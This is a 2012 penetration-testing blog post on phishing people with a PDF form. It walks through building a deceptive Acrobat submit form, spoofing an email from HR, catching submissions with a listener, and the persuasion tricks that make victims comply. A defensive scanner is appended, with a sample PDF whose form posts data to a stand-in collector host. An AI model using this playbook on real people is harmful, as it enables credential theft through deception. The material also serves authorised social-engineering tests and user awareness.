Tuesday, June 5, 2012

PDF Pwnage

During many penetration tests you may need to social engineer a target. You could send targets all kinds of payloads or malicious things, but sometimes that gets picked up by anti-virus. Also, sometimes getting ‘shell’ may not be in the rules of engagement.
Let’s talk about something that relies entirely on the user being conned into following the attacker’s instructions. The scenario is simple: send the user a PDF form and have them submit it. The attack breaks down into three main steps.
  1. Create the form
  2. Spoof an email
  3. Wait for the results
There are many ways to make this form, this is just how I did it.
First create a form and make it believable.
Word form
Next import it into Acrobat and select create PDF form.

Acrobat will do some magic; on the right-hand side click Add New Field -> OK Button. A blue box will appear; place it anywhere you want. This is your submit button. Click Properties and, on the Options tab, set the label to Submit. Finally, under the Actions tab, set the trigger to Mouse Down, select the action Submit a form, click Add and fill out the appropriate information. ***If you are doing this over an insecure network, use HTTPS please***

Save the document and then get ready to send it. In this example I would spoof it from a human resources person. Also, if you don’t know how to spoof an email you shouldn’t even be reading this.
Finally, we fire up our listener; this could be just netcat, or you can write your own listener. Thanks @kaospunk for the quick and dirty POC.
Why will this attack be successful?
  • The victim will be more relaxed because of the spoofed email.
  • If the email is worded carefully using words like ‘we’, ‘help’ and ‘required’, these words have a psychological effect on people, making them more apt to follow instructions.
  • No anti-virus will be triggered, which relaxes the user further.
  • The words in the document, “Please, use the submit button to ensure secure delivery of your information.”, reinforce the ‘trustworthiness’ of the message.
  • When a link is clicked in Adobe Reader it always asks whether the user wants to allow the connection. This inherently trains users to click Allow without reading.
  • It’s easy. Let’s face it, users are lazy.
Here is the result of a successful test attack.

How could the user have protected themselves?
  • Anytime a document requests sensitive information verify the source or sender.
  • If the requested action seems out of the ordinary verify the source or sender.
  • When the submit button is hit a warning pops up like the image below; verify the address the document is going to.
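A defender-side version of that last check, as an added example that is not part of the original post: it scans a PDF's raw syntax for SubmitForm actions and reports where each form posts and whether the target uses HTTPS, so the address can be verified before (or without) clicking. The sample PDF bytes are constructed and the hostnames are placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a one-page PDF whose submit widget fires on mouse-down
# (/AA /D) and posts to a plaintext-HTTP collector, plus an ordinary /URI
# link that must NOT be reported. Hostnames are placeholders.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R] >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 5 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Widget /FT /Btn /T (submit) /Rect [0 0 50 20]
   /AA << /D << /S /SubmitForm /F << /FS /URL /F (http://collector.example/post) >>
   /Flags 4 >> >> >> endobj
5 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 10 10]
   /A << /S /URI /URI (https://intranet.example/policy) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

SUBMIT_RE = re.compile(rb"/S\s*/SubmitForm")
# Matches /F (url) directly, or /F << /FS /URL /F (url) >> as Acrobat writes it.
TARGET_RE = re.compile(rb"/F\s*(?:<<.*?)?\(([^)]*)\)", re.S)


def find_submit_targets(pdf_bytes):
    """One record per SubmitForm action visible in the raw (uncompressed) PDF syntax.
    Caveat: actions inside compressed object streams are missed unless the file is
    decompressed first (a PDF library or qpdf); hex-string <...> URLs are not handled.
    """
    found = []
    for m in SUBMIT_RE.finditer(pdf_bytes):
        window = pdf_bytes[m.end():m.end() + 500]   # stay inside this object
        end = window.find(b"endobj")
        if end != -1:
            window = window[:end]
        t = TARGET_RE.search(window)
        if not t:
            continue
        url = t.group(1).decode("latin-1")
        found.append({
            "url": url,
            "host": urlparse(url).hostname or "",
            "https": url.lower().startswith("https://"),  # the post asks for HTTPS
        })
    return found


if __name__ == "__main__":
    for r in find_submit_targets(SAMPLE_PDF):
        flag = "" if r["https"] else "  [plaintext HTTP]"
        print(f"form submits to {r['host']}: {r['url']}{flag}")
```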

Good Luck!
